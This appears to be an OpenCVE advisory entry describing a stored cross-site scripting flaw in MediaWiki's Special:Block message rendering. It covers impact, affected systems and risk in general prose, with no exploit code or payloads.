Impact
This vulnerability is a Stored XSS flaw in Wikimedia Foundation MediaWiki, where a message added or edited through Special:Block is not properly neutralized when rendered on a page. The flaw allows an attacker to embed malicious JavaScript that will execute whenever a user views the block page, potentially hijacking the user's session, stealing credentials, or defacing content. The weakness is identified as CWE‑79 and represents an integrity and confidentiality compromise for any affected user who views the compromised page.
Affected Systems
The affected product is MediaWiki from the Wikimedia Foundation. Version information is not specified in the CVE data, so any deployment of MediaWiki that still hosts the vulnerable special block message handling code is at risk. Administrators must determine if their installed version includes the patch that eliminates the improper input sanitization.
Risk and Exploitability
The CVSS score is not provided, and the EPSS score is unavailable, so the exact risk level cannot be quantified from the public data. However, stored XSS vulnerabilities typically carry moderate to high severity, with the risk of exploitation depending on the accessibility of the Special:Block interface and the permissions of the users interacting with it. Since the vulnerability is not listed in CISA’s KEV catalog, there is no evidence of known active exploitation at this time, but the attack vector inferred from the description suggests that privileged users or those able to edit system messages could introduce malicious content.
OpenCVE Enrichment